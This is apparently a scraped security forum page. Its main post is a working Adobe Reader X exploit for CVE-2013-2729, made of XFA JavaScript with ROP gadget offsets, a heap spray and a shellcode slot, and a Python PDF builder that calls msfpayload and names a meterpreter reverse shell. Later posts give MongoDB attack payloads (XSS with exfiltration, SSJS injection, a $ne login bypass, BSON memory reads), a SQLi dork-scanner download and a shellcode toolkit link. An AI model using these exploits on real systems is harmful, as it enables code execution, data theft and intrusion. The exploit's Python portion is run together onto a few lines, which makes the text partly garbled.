<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
<?formServer defaultPDFRenderFormat acrobat9.1static?>
<?formServer allowRenderCaching 0?>
<?formServer formModel both?>
<subform name="form1" layout="tb" locale="en_US" restoreState="auto">
<pageSet>
<pageArea name="Page1" id="Page1">
<contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
<medium stock="default" short="612pt" long="792pt"/>
<?templateDesigner expand 1?>
</pageArea>
<?templateDesigner expand 1?>
</pageSet>
<variables>
<script name="util" contentType="application/x-javascript">
// Convenience functions to pack and unpack little endian and utf-16 strings
function pack(i){
    var low = (i & 0xffff);
    var high = ((i>>16) & 0xffff);
    return String.fromCharCode(low)+String.fromCharCode(high);
}
function unpackAt(s, pos){
    return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);
}
function packs(s){
    result = "";
    for (i=0;i<s.length;i+=2)
        result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));
    return result;
}
function packh(s){
    return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
}
function packhs(s){
    result = "";
    for (i=0;i<s.length;i+=4)
        result += packh(s.slice(i,i+4));
    return result;
}
var verbose = 1;
function message(x){
    if (util.verbose == 1 )
        xfa.host.messageBox(x);
}
//ROP0
//7201E63D XCHG EAX,ESP
//7201E63E RETN
//ROP1
//7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle]
//ROP2
//7238EF5C PUSH EAX
//7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress]
//7238EF63 TEST EAX,EAX
//7238EF65 JNE SHORT 7238EF84
//7238EF84 POP EBP
//7238EF85 RETN 4
//ROP3
//72001186 JMP EAX ; kernel32.VirtualProtect
//ROP4
//72242491 ADD ESP,70
//72242494 RETN
var _offsets = {
    "Reader": {
        "10.104": {
            "acrord32": 0xA4,
            "rop0": 0x1E63D,
            "rop1": 0x100A,
            "rop2": 0x38EF5C,
            "rop3": 0x1186,
            "rop4": 0x242491,
        },
        "10.105": { // Added by Eddie Mitchell
            "acrord32": 0xA5,
            "rop0": 0x1E52D,
            "rop1": 0x100A,
            "rop2": 0x393526,
            "rop3": 0x1186,
            "rop4": 0x245E71,
        },
        "10.106": { // Added by Eddie Mitchell
            "acrord32": 0xA5,
            "rop0": 0x1E52D,
            "rop1": 0x100A,
            "rop2": 0x393526,
            "rop3": 0x1186,
            "rop4": 0x245E71,
        },
    },
    "Exchange-Pro": {
        "10.105": { // Added by Eddie Mitchell
            "acrobat": 0xCD,
            "rop0": 0x3720D,
            "rop1": 0x100A,
            "rop2": 0x3DCC91,
            "rop3": 0x180F,
            "rop4": 0x25F2A1,
        },
    },
};
function offset(x){
    //app.viewerType will be "Reader" for Reader,
    //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro
    try {
        return _offsets[app.viewerType][app.viewerVersion][x];
    } catch (e) {
        xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!");
    }
    return 0x41414141;
}
</script>
<script name="spray" contentType="application/x-javascript">
// Global variable for spraying
var slide_size=%%SLIDESIZE%%;
var size = 200;
var chunkx = "%%MINICHUNKX%%";
var x = new Array(size);
var y = new Array(size);
var z = new Array(size);
var pointers = new Array(100);
var done = 0;
</script>
<?templateDesigner expand 1?>
</variables>
<subform w="576pt" h="756pt">
<!-- This image field holds the crashing image -->
<field name="ImageCrash">
<ui>
<imageEdit/>
</ui>
<value>
<image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image>
</value>
</field>
</subform>
<event activity="initialize" name="event__initialize">
<script contentType="application/x-javascript">
// This script runs at the very beginning and
// is used to prepare the memory layout
util.message("Initialize");
var i;
var j;
if (spray.done == 0){
    //Trigger LFH use
    var TOKEN = "\u5858\u5858\u5678\u1234";
    var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2);
    for (i=0; i < spray.size; i+=1)
        spray.x[i] = TOKEN + util.pack(i) + spray.chunkx.substring(0, chunk_len) + util.pack(i) + "";
    util.message("Initial spray done!");
    for (j=0; j < size; j++)
        for (i=spray.size-1; i > spray.size/4; i-=10)
            spray.x[i]=null;
    spray.done = 1;
    util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
}
// After this the form layout is rendered and the bug triggered
</script>
</event>
<event activity="docReady" ref="$host" name="event__docReady">
<script contentType="application/x-javascript">
// This script runs once the page is ready
util.message("DocReady");
var i;
var j;
var found = -1;  // Index of the overlapped string
var acro = 0;    // Base of the AcroRd32_dll
// Search over all strings for the first one with the broken TOKEN
for (i=0; i < spray.size; i+=1)
    if ((spray.x[i]!=null) && (spray.x[i][0] != "\u5858")){
        found = i;
        acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16;
        util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) );
        break;
    }
// Behaviour is mostly undefined if not found
if (found == -1){
    util.message("Corrupted String NOT Found!");
    event.target.closeDoc(true);
}
// Corrupted string was found let's generate the new
// string for overlapping the struct before freeing it
var chunky = "";
for (i=0; i < 7; i+=1)
    chunky += util.pack(0x41414141);
chunky += util.pack(0x10101000);
while (chunky.length < spray.slide_size/2)
    chunky += util.pack(0x58585858);
// Free the overlapping string
util.message("Freeing corrupted string! Previous string will be used-free ("+(found)+")");
for (j=0; j < 100000; j++)
    spray.x[found-1]=spray.x[found]=null;
// Trigger several allocs that will fall over the structure
for (i=0; i < 200; i+=1){
    ID = "" + i;
    spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ "";
}
util.message("Allocated 20 chunks-y\\n");
// Heap spraying make's baby jesus cry!
// Construct the 0x1000 small chunk for spraying
var obj = 0x10101000;
var pointer_slide = "";
pointer_slide += util.pack(acro+util.offset("rop4"));  //add esp,70;ret
for (i=0; i < 27; i+=1)
    pointer_slide += util.pack(0x41414141);
obj += pointer_slide.length*2;
// ROP
pointer_slide += util.pack(acro+util.offset("rop0"));  //XCHG EAX,ESP;ret
pointer_slide += util.pack(acro+util.offset("rop1"));  //0x100A jmp getmodule
pointer_slide += util.pack(acro+util.offset("rop2"));  //@0x04 - getProcAddress
pointer_slide += util.pack(obj+0xDC);                  //@0x08 point to KERNEL32
//@0x10
pointer_slide += util.pack(obj+0xCC);
pointer_slide += util.pack(0x43434343);                // POPPED TO EBP
pointer_slide += util.pack(acro+util.offset("rop3"));  // JMP EAX
pointer_slide += util.pack(obj);                       //Points to offset 0 of this
//@0x20
pointer_slide += util.pack(obj+0x38);
pointer_slide += util.pack(obj+0x38);
pointer_slide += util.pack(0x1000);                    //SIZE_T dwSize,
pointer_slide += util.pack(0x40);                      // DWORD flNewProtect,
//0x30
pointer_slide += util.pack(obj+0x34);                  //PDWORD lpflOldProtect
pointer_slide += util.pack(0x00000000);                //DWORD OldProtect
pointer_slide += util.packhs("E9B1000000909090");
//0x40
pointer_slide += util.pack(acro);                      //Used by next stage
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
//0x50
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
//0x60
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.pack(0xCCCCCCCC);
//0x70
pointer_slide += util.pack(acro);
pointer_slide += util.pack(0x48484848);
pointer_slide += util.pack(0x49494949);
pointer_slide += util.pack(0x49494949);
//0x80
pointer_slide += util.pack(0x49494949);
pointer_slide += util.pack(0x50505050);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0x90
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0xa0
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0xb0
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
//0xc0
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0x46464646);
pointer_slide += util.pack(0xCCCCCCCC);
pointer_slide += util.packs("VirtualProtect");
//@0xCC
pointer_slide += "\u0000";
pointer_slide += "KERNEL32";
pointer_slide += "\u0000";
pointer_slide += "%%SHELLCODE%%";
while (pointer_slide.length < 0x1000/2)
    pointer_slide += util.pack(0x41414141);
pointer_slide = pointer_slide.substring(0,0x1000/2);
util.message("Pointer slide size: " + pointer_slide.length);
// And now ensure it gets bigger than 0x100000 bytes
while (pointer_slide.length < 0x100000/2)
    pointer_slide += pointer_slide;
// And the actual spray
for (i=0; i < 100; i+=1)
    spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + "";
// Everything done here close the doc and
// trigger the use of the vtable
util.message("Now what?");
var pdfDoc = event.target;
pdfDoc.closeDoc(true);
</script>
</event>
</subform>
<?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
<?templateDesigner DefaultLanguage JavaScript?>
<?templateDesigner DefaultRunAt client?>
<?acrobat JavaScript strictScoping?>
<?PDFPrintOptions embedViewerPrefs 0?>
<?PDFPrintOptions embedPrintOnFormOpen 0?>
<?PDFPrintOptions scalingPrefs 0?>
<?PDFPrintOptions enforceScalingPrefs 0?>
<?PDFPrintOptions paperSource 0?>
<?PDFPrintOptions duplexMode 0?>
<?templateDesigner DefaultPreviewType interactive?>
<?templateDesigner DefaultPreviewPagination simplex?>
<?templateDesigner XDPPreviewFormat 19?>
<?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
<?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
<?templateDesigner Zoom 119?>
<?templateDesigner FormTargetVersion 30?>
<?templateDesigner SaveTaggedPDF 1?>
<?templateDesigner SavePDFWithEmbeddedFonts 1?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
<config xmlns="http://www.xfa.org/schema/xci/3.0/">
<agent name="designer">
<!-- [0..n] -->
<destination>pdf</destination>
<pdf>
<!-- [0..n] -->
<fontInfo/>
</pdf>
</agent>
<present>
<!-- [0..n] -->
<pdf>
<!-- [0..n] -->
<version>1.7</version>
<adobeExtensionLevel>5</adobeExtensionLevel>
</pdf>
<common/>
<xdp>
<packets>*</packets>
</xdp>
</present>
</config>
<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
<locale name="en_US" desc="English (United States)">
<calendarSymbols name="gregorian">
<monthNames>
<month>January</month>
<month>February</month>
<month>March</month>
<month>April</month>
<month>May</month>
<month>June</month>
<month>July</month>
<month>August</month>
<month>September</month>
<month>October</month>
<month>November</month>
<month>December</month>
</monthNames>
<monthNames abbr="1">
<month>Jan</month>
<month>Feb</month>
<month>Mar</month>
<month>Apr</month>
<month>May</month>
<month>Jun</month>
<month>Jul</month>
<month>Aug</month>
<month>Sep</month>
<month>Oct</month>
<month>Nov</month>
<month>Dec</month>
</monthNames>
<dayNames>
<day>Sunday</day>
<day>Monday</day>
<day>Tuesday</day>
<day>Wednesday</day>
<day>Thursday</day>
<day>Friday</day>
<day>Saturday</day>
</dayNames>
<dayNames abbr="1">
<day>Sun</day>
<day>Mon</day>
<day>Tue</day>
<day>Wed</day>
<day>Thu</day>
<day>Fri</day>
<day>Sat</day>
</dayNames>
<meridiemNames>
<meridiem>AM</meridiem>
<meridiem>PM</meridiem>
</meridiemNames>
<eraNames>
<era>BC</era>
<era>AD</era>
</eraNames>
```
</calendarSymbols> <datePatterns> <datePattern name="full">EEEE, MMMM D, YYYY</datePattern> <datePattern name="long">MMMM D, YYYY</datePattern> <datePattern name="med">MMM D, YYYY</datePattern> <datePattern name="short">M/D/YY</datePattern> </datePatterns> <timePatterns> <timePattern name="full">h:MM:SS A Z</timePattern> <timePattern name="long">h:MM:SS A Z</timePattern> <timePattern name="med">h:MM:SS A</timePattern> <timePattern name="short">h:MM A</timePattern> </timePatterns> <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols> <numberPatterns> <numberPattern name="numeric">z,zz9.zzz</numberPattern> <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern> <numberPattern name="percent">z,zz9%</numberPattern> </numberPatterns> <numberSymbols> <numberSymbol name="decimal">.</numberSymbol> <numberSymbol name="grouping">,</numberSymbol> <numberSymbol name="percent">%</numberSymbol> <numberSymbol name="minus">-</numberSymbol> <numberSymbol name="zero">0</numberSymbol> </numberSymbols> <currencySymbols> <currencySymbol name="symbol">$</currencySymbol> <currencySymbol name="isoname">USD</currencySymbol> <currencySymbol name="decimal">.</currencySymbol> </currencySymbols> <typefaces> <typeface name="Myriad Pro"/> <typeface name="Minion Pro"/> <typeface name="Courier Std"/> <typeface name="Adobe Pi Std"/> <typeface name="Adobe Hebrew"/> <typeface name="Adobe Arabic"/> <typeface name="Adobe Thai"/> <typeface name="Kozuka Gothic Pro-VI M"/> <typeface name="Kozuka Mincho Pro-VI R"/> <typeface name="Adobe Ming Std L"/> <typeface name="Adobe Song Std L"/> <typeface name="Adobe Myungjo Std M"/> </typefaces> </locale> <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data xfa:dataNode="dataGroup"/> </xfa:datasets> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 "> <rdf:RDF 
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about=""> <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate> <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool> <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate> <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate> </rdf:Description> <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about=""> <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer> </rdf:Description> <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about=""> <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID> </rdf:Description> <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about=""> <dc:format>application/pdf</dc:format> </rdf:Description> </rdf:RDF> </x:xmpmeta> <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"> <annots/> </xfdf></xdp:xdp> ''' assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry" #shellcode xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode)) xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE); xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE)) xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64')) #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64')) file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp) #The document doc = PDFDoc() #font font = PDFDict() font.add("Name", PDFName("F1")) font.add("Subtype", PDFName("Type1")) font.add("BaseFont", PDFName("Helvetica")) #name:font map fontname = PDFDict() fontname.add("F1",font) #resources resources = PDFDict() resources.add("Font",fontname) #contents contentsDict = PDFDict() contents= PDFStream(contentsDict, '''BT /F1 24 Tf 100 100 Td (Pedefe Pedefeito Pedefeon!) 
Tj ET''') #page page = PDFDict() page.add("Type",PDFName("Page")) page.add("Resources",resources) page.add("Contents", PDFRef(contents)) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids", PDFArray([PDFRef(page)])) pages.add("Count", PDFNum(1)) #add parent reference in page page.add("Parent",PDFRef(pages)) xfa = PDFStream(PDFDict(), xdp) xfa.appendFilter(FlateDecode()) doc.add(xfa) #form form = PDFDict() form.add("XFA", PDFRef(xfa)) doc.add(form) #shellcode2 shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10) doc.add(shellcode2) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Pages", PDFRef(pages)) catalog.add("NeedsRendering", "true") catalog.add("AcroForm", PDFRef(form)) adbe = PDFDict() adbe.add("BaseVersion","/1.7") adbe.add("ExtensionLevel",PDFNum(3)) extensions = PDFDict() extensions.add("ADBE", adbe) catalog.add("Extensions",extensions) doc.add([catalog,pages,page,contents]) doc.setRoot(catalog) #render it return doc.__str__() if __name__ == '__main__': import optparse,os from subprocess import Popen, PIPE parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit') parser.add_option('--debug', action='store_true', default=False, help='For debugging') parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 
'win32_exec CMD=calc'") parser.add_option('--payload', metavar='PAYLOAD', default=None) parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') (options, args) = parser.parse_args() if options.doc: print __doc__ os.exit(-1) if options.debug: print mkXFAPDF(), os.exit(-1) if options.payload == None: #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R" msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE) shellcode = msfpayload.communicate()[0] else: shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex') print mkXFAPDF(shellcode), Sursa: https://github.com/feliam/CVE-2013-2729/blob/master/XFABMPExploit.py
  21. Adobe Reader X BMP/RLE heap corruption Adobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10 it includes the Protected Mode, a sandbox technology similar to the one in Google Chrome which improves the overall security of the product. Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious bmp image triggers a heap overflow. Download: http://t.co/ivC0BG33fh
  22. [h=3]Attacking MongoDB[/h]

I'm not going to describe the way a database is installed: developers make everything possible to ease this process even without using manuals. Let's focus on features that seem really interesting.

The first thing is a REST interface. It is a web interface which runs by default on port 28017 and allows an administrator to control their databases remotely via a browser. Working with this DBMS option, I found several vulnerabilities: two stored XSS vulnerabilities, undocumented SSJS (Server Side JavaScript) code execution, and multiple CSRF. I'm going to detail the above-mentioned vulnerabilities.

The fields Clients and Log have two stored XSS vulnerabilities. It means that, making any request with HTML code to the database, this code will be written to the source code of the page of the REST interface and will be executed in the browser of a person who visits this page. These vulnerabilities make the following attack possible:

1. Send a request with the tag SCRIPT and JS address.
2. An administrator opens the web interface in a browser, and the JS code gets executed in this browser.
3. Request command execution from the remote server via the JSONP script. The script performs the command using undocumented SSJS code execution.
4. The result is sent to our remote host, where it is written to a log.

As to undocumented SSJS code execution, I've written a template, which can be modified as may seem necessary:

http://vuln-host:28017/admin/$cmd/?filter_eval=function(){ return db.version() }&limit=1

It is well known that it is necessary to have a driver, which will serve as transport, to work with any significant database written in a script language, for instance PHP. I decided to take a close look at these drivers for MongoDB and chose a driver for PHP. Suppose there is a completely configured server with Apache+PHP+MongoDB and a vulnerable script.
The main fragments of this script are as follows:

$q = array("name" => $_GET['login'], "password" => $_GET['password']);
$cursor = $collection->findOne($q);

The script makes a request to the MongoDB database when the data has been received. If the data is correct, then it receives an array with the user's data as output. It looks as follows:

echo 'Name: ' . $cursor['name'];
echo 'Password: ' . $cursor['password'];

Suppose the following parameters have been sent to it (True):

?login=admin&password=pa77w0rd

Then the request to the database will look as follows:

db.items.findOne({"name" :"admin", "password" : "pa77w0rd"})

Due to the fact that the database contains the user admin with the password pa77w0rd, its data is output as a response (True). If another name or password is used, then the response will return nothing (False).

There are conditions in MongoDB similar to the common WHERE, except for a few differences in syntax. Thus it is necessary to write the following to output records whose names are not admin from the table items:

db.items.find({"name" :{$ne : "admin"}})

PHP only requires another array to be put into the one which is sent by the function findOne. Let's proceed from theory to practice. At first, create a request whose sample will comply with the following conditions: password is not 1 and user is admin.

db.items.findOne({"name" :"admin", "password" : {$ne : "1"}})

It will look as follows in PHP:

$q = array("name" => "admin", "password" => array("\$ne" => "1"));

It is only needed to declare the variable password as an array for exploitation:

?login=admin&password[$ne]=1

Consequently, the admin data is output (True). This problem can be solved by the function is_array() and by bringing input arguments to the string type.

Another vulnerability typical of MongoDB and PHP if used together is related to injection of your data into a SSJS request made to a server. I'll use code to exemplify it.
Assume that INSERT looks as follows:

$q = "function() { var loginn = '$login'; var passs = '$pass'; db.members.insert({id : 2, login : loginn, pass : passs}); }";

An important condition is that the variables $pass and $login are taken directly from the array $_GET and are not filtered (yes, it's an obvious fail, but it's very common). Send test data:

?login=user&password=password

Receive the following data in response:

Your login:user
Your password:password

Let's try to exploit the vulnerability, which presupposes that data sent to a parameter is not filtered or verified. Rewrite the loginn variable:

?login=user&password=1'; var loginn = db.version(); var b='

The first thing we want is to read other records. A simple request is of help:

/?login=user&password= '; var loginn = tojson(db.members.find()[0]); var b='2

Of course, it may happen that there will be no output; then it will be needed to use a time-based technique, which is based on a server response delay depending on a condition (true/false), to receive data. Here is an example:

?login=user&password='; if (db.version() > "2") { sleep(10000); exit; } var loginn =1; var b='2

It is well known that MongoDB allows creating users for a specific database. Information about users in databases is stored in the table db.system.users. We are mostly interested in the fields user and pwd of the above-mentioned table. The user column contains a user login, pwd an MD5 string "%login%:mongo:%password%", where login and password are the login and hash of the login, key, and user password. All data is transferred unencrypted, and packet hijacking allows obtaining specific data necessary to receive a user's name and password. It is needed to hijack nonce, login, and key sent by a client when authorizing on the MongoDB server. Key contains an MD5 string of the following form: "%nonce% + %login% + md5(%login% + ":mongo:" + %password%)".
Let's move further and consider another type of vulnerability, based on wrong parsing of a BSON object transferred in a request to a database. A few words about BSON at first. BSON (Binary JavaScript Object Notation) is a computer data interchange format used mainly as storage for various data (Bool, int, string, etc.). Assume there is a table with two records:

> db.test.find({})
{ "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "admin", "isadmin" : true }
{ "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "noadmin", "isadmin" : false }

And a database request which can be injected:

> db.test.insert({ "name" : "noadmin2", "isadmin" : false})

Just insert a crafted BSON object into the column name:

> db.test.insert({ "name\x16\x00\x08isadmin\x00\x01\x00\x00\x00\x00\x00" : "noadmin2", "isadmin" : false})

0x08 before isadmin specifies that the data type is boolean and 0x01 sets the object value as true instead of the false assigned by default. The point is that, dealing with variable types, it is possible to rewrite data rendered automatically with a request. Now let's see what there is in the table:

> db.test.find({})
{ "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "admin", "isadmin" : true }
{ "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "noadmin", "isadmin" : false }
{ "_id" : ObjectId("5044ebf6a91b02e9a9b065e3"), "name" : null, "isadmin" : true, "isadmin" : true }

False has been successfully changed into true!

Let's consider a vulnerability in the BSON parser which allows reading arbitrary storage areas. Due to incorrect parsing of the length of a BSON document in the column name in the insert command, MongoDB makes it possible to insert a record that will contain a Base64 encrypted storage area of the database server. Suppose we have a table named dropme and enough privileges to write in it.
> db.dropme.insert({"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"})
> db.dropme.find()
{ "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkAOQAsAC...........................ACkALAAgACIAFg==") }

It happens because the length of the BSON object is incorrect: 0x010 instead of 0x01. When the Base64 code is decrypted, we receive bytes of random server storage areas.

Author: Positive Research

Sursa: http://blog.ptsecurity.com/2012/11/attacking-mongodb_26.html
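The PHP operator-injection case from the Attacking MongoDB post, as an added example that is not part of the original post: it models how PHP's $_GET turns password[$ne]=1 into a nested array, runs the vulnerable filter next to the is_array()/string-cast fix the post names, and adds a guard that flags "$" operator keys in a filter. The query-string parser, the in-memory findOne() stand-in and the sample user record are constructed for the example.

```javascript
// Added example (not from the Positive Research post). Models the PHP
// "password[$ne]=1" operator injection against a MongoDB findOne() filter
// and the is_array()/string-cast fix, plus a guard for "$" operator keys.

// Parse a query string the way PHP fills $_GET: "a[b]=1" becomes {a: {b: "1"}}.
// Only one bracket level is supported, which is all this case needs (constructed).
function parseQueryLikePhp(qs) {
  const out = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const val = decodeURIComponent(eq < 0 ? '' : pair.slice(eq + 1));
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      if (typeof out[m[1]] !== 'object' || out[m[1]] === null) out[m[1]] = {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Vulnerable filter builder: mirrors
// array("name" => $_GET['login'], "password" => $_GET['password']).
function buildFilterVulnerable(params) {
  return { name: params.login, password: params.password };
}

// Hardened builder: the fix the post names, is_array() rejection plus a
// cast to string, so a nested array can never become a query operator.
function buildFilterSafe(params) {
  const toScalar = (v) => {
    if (v !== null && typeof v === 'object') throw new Error('scalar expected');
    return v === undefined ? '' : String(v);
  };
  return { name: toScalar(params.login), password: toScalar(params.password) };
}

// Defender-side guard: true when any key at any depth starts with "$".
function containsOperator(doc) {
  if (doc === null || typeof doc !== 'object') return false;
  return Object.entries(doc).some(([k, v]) => k.startsWith('$') || containsOperator(v));
}

// Minimal stand-in for findOne(): equality and $ne only (constructed).
const users = [{ name: 'admin', password: 'pa77w0rd' }]; // constructed record
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === 'object') {
      return Object.entries(cond).every(([op, v]) => op === '$ne' && doc[field] !== v);
    }
    return doc[field] === cond;
  });
}
function findOne(filter) {
  return users.find((u) => matches(u, filter)) || null;
}

// Walk both paths for the injected request from the post.
function demo() {
  const params = parseQueryLikePhp('?login=admin&password[$ne]=1');
  const vuln = buildFilterVulnerable(params); // {name:"admin", password:{$ne:"1"}}
  const result = { injected: containsOperator(vuln), bypassed: findOne(vuln) !== null };
  try { buildFilterSafe(params); result.safeRejected = false; }
  catch (e) { result.safeRejected = true; }
  return result; // { injected: true, bypassed: true, safeRejected: true }
}
console.log(demo());
```

With the vulnerable builder the admin record is returned without knowing the password; the safe builder refuses the request before any query is built.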
  23. SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool

SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool is a tool which scans websites through dorks automatically and finds vulnerabilities in them. It's a very easy and powerful tool to find vulnerable sites of any country.

New Features:
- "Look & Feel" is more attractive now.
- Rich "Context Menu" items.
- "Results" contain checkboxes to enable selection.
- "Selected Dork" box is editable now for user convenience.
- Built-in Browser for "Injection Builder" to check the impact of injection.
- "Text Bucket" available for "Injection Builder" to save extra data.
- "Insert Order By" button is added to "Injection Builder".
- "Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
- It won't get stuck after pressing the stop button. Just a minor wait can occur, which is okay.
- Progress bar for "Crawler" has been fixed. It will show correct progress now.
- Error on importing file is fixed now. You can import files from other directories as well.
- "Searchqu" shows invalid results. It is fixed now.

Download: Sql Poizon v1.1 – Sqli Exploit Scanner, Injection Builder Tool
password: racun
Virus Scan 1 | Virus scan 2
Make sure "Run As Administrator"

Sursa: SQL Poizon v1.1 - SQLi Exploit Scanner, Search Hunter, Injection Builder Tool | Rianul WP Blog
  24. [h=1]Lie to Me: Bypassing Modern Web Application Firewalls[/h] [h=2]by Vladimir Vorontsov on May 26, 2013[/h] The report considers the analysis of modern Web Application Firewalls. The author provides a comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading vectors of various attacks via WAFs for different algorithms. Slides: http://www.slideshare.net/d0znpp/lie-tomephd2013
  25. Shellcodecs Shellcoding Toolset Site blackhatlibrary.net Shellcodecs is a collection of shellcodes, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process. Download: http://packetstormsecurity.com/files/download/121852/shellcodecs.tar.gz Sursa: Shellcodecs Shellcoding Toolset ≈ Packet Storm